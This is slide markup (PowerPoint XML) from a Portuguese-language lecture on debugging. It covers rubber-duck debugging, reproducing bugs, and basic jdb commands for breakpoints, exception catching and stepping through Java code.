              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Rubber Ducking Debugging</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Ideia: explicar em voz alta o bug para uma "outra pessoa"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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83" name="Google Shape;283;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139625" y="2448225"/>
            <a:ext cx="2291200" cy="2291200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408225" y="4816300"/>
            <a:ext cx="16104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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fonte: wikipedia</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104925" y="139700"/>
            <a:ext cx="894849" cy="116667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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235500" y="1762075"/>
            <a:ext cx="8668800" cy="609300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depuradores</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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92" name="Google Shape;292;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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jdb (Java Debugger) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Depurador de linhas de comando</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Apenas como exemplo: depuradores de qualquer linguagem são semelhantes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Muitas vezes, possuem tamb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>ém uma interface gráfica</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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Fluxo de Depura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Iniciar sessão de depuração</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Definir breakpoints</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Executar programa até um breakpoint</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Inspecionar estado</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Avançar passo a passo</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Continuar com a execução</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235500" y="1838275"/>
            <a:ext cx="8668800" cy="609300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comandos do jdb</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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13" name="Google Shape;313;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Iniciando a sess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ão de depuração</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Na linha de comando:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>jdb myMainClass.class     -- classe com o main da app </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Reproduzir o bug</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Reproduzir o bug com a menor entrada possível</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Melhor ainda: escrever um teste que reproduza o bug</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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2. Definir breakpoints</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>stop:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>  define breakpoints</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>stop at MyClass:22                     -- linha da classe</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>stop in java.lang.String.length    -- início do método</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>stop in MyClass.&lt;init&gt;                -- construtor da classe</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Definir breakpoints (cont.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>catch:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> define um breakpoint para quando ocorrer o throw de uma exceção </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>("stop the application at the point where it is thrown")</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>catch java.io.FileNotFoundException</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>catch mypackage.BigTroubleException</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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3. Executar o programa at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>é um breakpoint</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
